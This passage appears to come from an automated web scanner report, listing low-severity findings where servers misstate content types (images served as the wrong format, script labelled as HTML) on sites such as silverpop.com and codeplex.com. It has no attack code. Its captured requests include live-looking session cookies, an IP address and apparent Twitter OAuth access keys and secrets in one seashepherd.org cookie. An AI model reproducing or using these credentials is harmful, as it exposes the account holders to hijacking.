Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:28:25 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Tue, 05 Feb 2008 20:19:43 GMT
Accept-Ranges: bytes
Content-Length: 894
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ...............................................V..j$...........................vp.................^..R...W........................vp.xr..............f..R..`.............
...[SNIP]...

29.102. http://www.codeplex.com/site/analyticsid.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.codeplex.com
Path:	/site/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /site/analyticsid.aspx HTTP/1.1
Host: www.codeplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rawr.codeplex.com/
Cookie: ASP.NET_SessionId=1rkf4qe1hdczdv3okbmzafvt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:56 GMT
Content-Length: 69

29.103. http://www.fiddler2.com/fiddler2/updatecheck.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.fiddler2.com
Path:	/fiddler2/updatecheck.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /fiddler2/updatecheck.asp?isBeta=True HTTP/1.1
User-Agent: Fiddler/2.3.4.4 beta (.NET 2.0.50727.4961; Microsoft Windows NT 6.1.7600.0)
Pragma: no-cache
Referer: http://fiddler2.com/client/2.3.4.4
Host: www.fiddler2.com
Proxy-Connection: Close

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:47:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 257
Content-Type: text/plain
Cache-control: private

2
3
4
5
2.3.4.5 [7/9/2011]
Various bugfixes

2.3.4.4 [6/22/2011]
AutoUpdater
Tweaks for Firefox 5

2.3.4.3 [6/17/2011]
Improved AutoResponder
JSON Inspectors
Screenshot toolbar but
...[SNIP]...

29.104. http://www.jackhenry.com/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jackhenry.com
Path:	/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif HTTP/1.1
Host: www.jackhenry.com
Proxy-Connection: keep-alive
Referer: http://www.jackhenry.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 32812
Content-Type: image/gif
Content-Location: http://www.jackhenry.com/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif
Last-Modified: Thu, 20 Dec 2007 21:35:16 GMT
Accept-Ranges: bytes
ETag: "6a23c365043c81:23b3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 19:02:39 GMT
Connection: close

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Windows.2007:04:24 10:00:16.........
...[SNIP]...

29.105. http://www.jackhenrybanking.com/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.jackhenrybanking.com
Path:	/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif HTTP/1.1
Host: www.jackhenrybanking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jackhenrybanking.com/

Response

HTTP/1.1 200 OK
Content-Length: 16288
Content-Type: image/gif
Content-Location: http://www.jackhenrybanking.com/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif
Last-Modified: Thu, 20 Dec 2007 21:38:02 GMT
Accept-Ranges: bytes
ETag: "48d347995043c81:23b3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 19:10:14 GMT

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
...1......%"..?..........................................................................................................................
...[SNIP]...

29.106. http://www.nmmlaw.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nmmlaw.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.nmmlaw.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 375dab189ae785dd86afe53226bc8ecd=d48b5b854478fe967f99103e7fac9089

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 12:19:32 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Fri, 18 Feb 2011 19:57:06 GMT
ETag: "23c00f6-47e-49c93eb246880"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

29.107. http://www.othersonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.othersonline.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.othersonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: cd=false

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Thu, 21 Jul 2011 19:20:30 GMT
ETag: "541b8-1fe-c080e900"
Last-Modified: Thu, 30 Dec 2010 02:50:44 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 510
Connection: keep-alive

..............(...&...............N...(....... ...............................F.(.H...{.%.`3..e?H..hl..................................................s.D.....F...G..C.@.....F....7..,....S..^.....N.l
...[SNIP]...

29.108. http://www.seashepherd.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.seashepherd.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.seashepherd.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d; __utma=208012304.1819747705.1311426916.1311426916.1311426916.1; __utmb=208012304.1.10.1311426916; __utmc=208012304; __utmz=208012304.1311426916.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:15:23 GMT
Server: Apache
Last-Modified: Thu, 19 Nov 2009 18:56:24 GMT
ETag: "467058b-47e-ea6ce600"
Accept-Ranges: bytes
Content-Length: 1150
X-Powered-By: PleskLin
Content-Type: text/plain

............ .h.......(....... ..... ..........................................................PE..............................................................9'.......................................
...[SNIP]...

29.109. http://www.silverlight.net/omniture/analyticsid previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverlight.net
Path:	/omniture/analyticsid

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /omniture/analyticsid HTTP/1.1
Host: www.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getting-started
Cookie: SilverlightFirstVisit3=LastVisited=GettingStarted; omniID=1311396409830_c861_c67b_bd36_91d8c0995578

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Umbraco-Version: 4.7
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:48 GMT

29.110. http://www.silverpop.com/de/images/headers/About_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/de/images/headers/About_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /de/images/headers/About_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Mar 2011 13:58:14 GMT
ETag: "13fdb8-336b-a2a82980"
Accept-Ranges: bytes
Content-Length: 13163
Content-Type: image/jpeg

GIF89a.j.....................o......r.......C..D..D].#.........5..{.3z.V..j.....M......s.KJ....;l..........R.....n..L...d....Sy....5.....&b.+.....s...(}...[..T......e.3.....]..(.....7..Y..<..8`.&T...
...[SNIP]...

29.111. http://www.silverpop.com/de/images/headers/Clients_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/de/images/headers/Clients_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /de/images/headers/Clients_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Mar 2011 14:09:36 GMT
ETag: "13fdb4-3200-cb4ea800"
Accept-Ranges: bytes
Content-Length: 12800
Content-Type: image/jpeg

GIF89a.j......o........C..D.....D].#......{.3z.V..j.....M...4..s.K..;........R..k..L........SV....5.....&b.,.....s........[..T...f.3s....]...........(..7..Y.....<.....8......M..`.&.....]..R|..l......
...[SNIP]...

29.112. http://www.silverpop.com/de/images/headers/Impressum_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/de/images/headers/Impressum_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /de/images/headers/Impressum_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Mar 2011 14:10:07 GMT
ETag: "13fecd-3259-cd27adc0"
Accept-Ranges: bytes
Content-Length: 12889
Content-Type: image/jpeg

GIF89a.j......o............i.......C..D.....D].#......{.3z.V5....jU....Ms.K.....;...........R.....k..L.....Sr....5.....&b.+y.......s...........[..T...f.3.....].....(.....7..Y..<..8N..`.&.....]..U....
...[SNIP]...

29.113. http://www.silverpop.com/de/images/headers/NewsEvents_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/de/images/headers/NewsEvents_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /de/images/headers/NewsEvents_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Mar 2011 14:10:38 GMT
ETag: "13fdc0-32fc-cf00b380"
Accept-Ranges: bytes
Content-Length: 13052
Content-Type: image/jpeg

GIF89a.j................].$...........o.....C..D...........D.........{.3z.V..j5....M...s.K..;z..r.......Rl....n........L...L.......S..5.....&.....sb.+...........[..T......f.3..].....(d....7..Y)}...<T
...[SNIP]...

29.114. http://www.silverpop.com/de/images/headers/PrivacyLegal_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/de/images/headers/PrivacyLegal_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /de/images/headers/PrivacyLegal_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 15 Jun 2011 13:58:18 GMT
ETag: "13fdc4-329f-8b681280"
Accept-Ranges: bytes
Content-Length: 12959
Content-Type: image/jpeg

GIF89a.j............o.........U.......C..D.....D].#............{.3z.V..jr....Ms.K..;...........R..n........L...l....S..5.....&b.+.....s...M.....{..5....[..T...f.3..].....(..7..Y..<..8`.&...(}......].
...[SNIP]...

29.115. http://www.silverpop.com/de/images/headers/Resources_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/de/images/headers/Resources_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /de/images/headers/Resources_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Mar 2011 14:11:09 GMT
ETag: "13fdc6-3321-d0d9b940"
Accept-Ranges: bytes
Content-Length: 13089
Content-Type: image/jpeg

GIF89a.j...............................].#...K..........o...s....C..D......y.......D.........5.....{.3.q...M..j..;s.K...z.V..R..n.....L........S..5]..m.......&(}....b.+..t......d....[..T...f.3..]T...
...[SNIP]...

29.116. http://www.silverpop.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 04 Feb 2009 20:40:01 GMT
ETag: "d0257-37e-cab0ca40"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

29.117. http://www.silverpop.com/global/dropmenu/settings.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/global/dropmenu/settings.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /global/dropmenu/settings.js HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:52:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Oct 2009 03:56:12 GMT
ETag: "e0333-33-c68cef00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 51
Content-Type: application/x-javascript

qm_create(0,false,250,250,false,false,false,false);

29.118. http://www.silverpop.com/images/headers/Clients_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/Clients_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/Clients_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:57:23 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 16 Mar 2011 21:19:38 GMT
ETag: "efd00-31dc-1a2dae80"
Accept-Ranges: bytes
Content-Length: 12764
Content-Type: image/jpeg

GIF89a.j.........o........C..D.....D].#.........{.3z.V..j..Ms.K..;........R..k..L.....S..55..........&b.,.....s.........U....[..T.........f.3.....].....(..7r.....l....Y..<{....8L.....`.&..]..U.....1.
...[SNIP]...

29.119. http://www.silverpop.com/images/headers/NewsEvents_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/NewsEvents_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/NewsEvents_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 20:41:15 GMT
ETag: "efcf3-3376-aec010c0"
Accept-Ranges: bytes
Content-Length: 13174
Content-Type: image/jpeg

GIF89a.j........................o........C..D...........D].#.........{.3z.V..jr.......Ms.K..;...y.............R..nL..5....L.....S..5l.......&b.+.....s........[..T...f.3...T....]...)}...(..7..Y..<d...
...[SNIP]...

29.120. http://www.silverpop.com/images/headers/Partners_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/Partners_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/Partners_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:56:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 16 Mar 2011 21:22:13 GMT
ETag: "efcf4-322d-236acb40"
Accept-Ranges: bytes
Content-Length: 12845
Content-Type: image/jpeg

GIF89a.j.........o........C..D.....D].#......{.3z.V..jV....M...s.K..;...........R..k..L.....S..55.......&b.+.....s...........[..T......f.3.....]...r....(..7..Y..<...N....8m........y..`.&..]..U.....1.
...[SNIP]...

29.121. http://www.silverpop.com/images/headers/Preferences_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/Preferences_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/Preferences_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:57:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 17:32:21 GMT
ETag: "efd01-328d-b30f340"
Accept-Ranges: bytes
Content-Length: 12941
Content-Type: image/jpeg

GIF89a.j......................5.....].#........o...J.......C..D......s....D............{.3..jz.V..Ms.K.....;..R..n...........L...x....S..5.....&.....sb.+......(}...[..T...f.3..]...m....(..7..Y.t...<d
...[SNIP]...

29.122. http://www.silverpop.com/images/headers/PrivacyLegal_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/PrivacyLegal_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/PrivacyLegal_L3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.silverpop.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 19:16:29 GMT
ETag: "efcf6-3332-7f99dd40"
Accept-Ranges: bytes
Content-Length: 13106
Content-Type: image/jpeg

GIF89a.j....4.....].$.............p.........os................C..D..D...............{.3y.V..j..M........;s.K........Rl....nK..y....L........S..5.....&..sb.+.....[..T...d........f.3..]...T..(}...(..7T
...[SNIP]...

29.123. http://www.silverpop.com/images/headers/Resources_L3.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverpop.com
Path:	/images/headers/Resources_L3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/headers/Resources_L3.jpg HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/marketing-resources/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:53:32 GMT
Server: Apache/2.2.3 (CentOS)
